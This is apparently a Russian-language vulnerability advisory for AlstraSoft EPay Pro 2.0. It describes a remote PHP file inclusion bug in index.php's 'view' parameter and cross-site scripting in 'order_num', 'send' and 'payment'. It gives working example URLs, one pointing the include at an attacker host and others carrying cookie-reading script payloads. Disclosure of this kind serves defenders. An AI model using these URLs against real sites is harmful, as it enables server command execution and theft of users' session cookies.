Программа: AlstraSoft EPay Pro 2.0

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные команды на целевой
системе.

1. PHP-инклюдинг возможет из-за
недостаточной фильтрации данных в
параметре view сценария index.php. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
команды на системе с привилегиями web
сервера.

Пример:

http://[target]/epal/index.php?view=http://[attacker]?

2. Межсайтовый скриптинг возможен из-за
недостаточной фильтрации данных в
параметрах 'order_num' и 'send'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Пример:

http://[target]/epal/?order_num=crap&payment="> <script>alert(document.cookie)</script>&send=first&
send=regular&send=priority&send=express

http://[target]/epal/?order_num=crap&payment=crap &send=first&send=regular&send=priority&send='%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии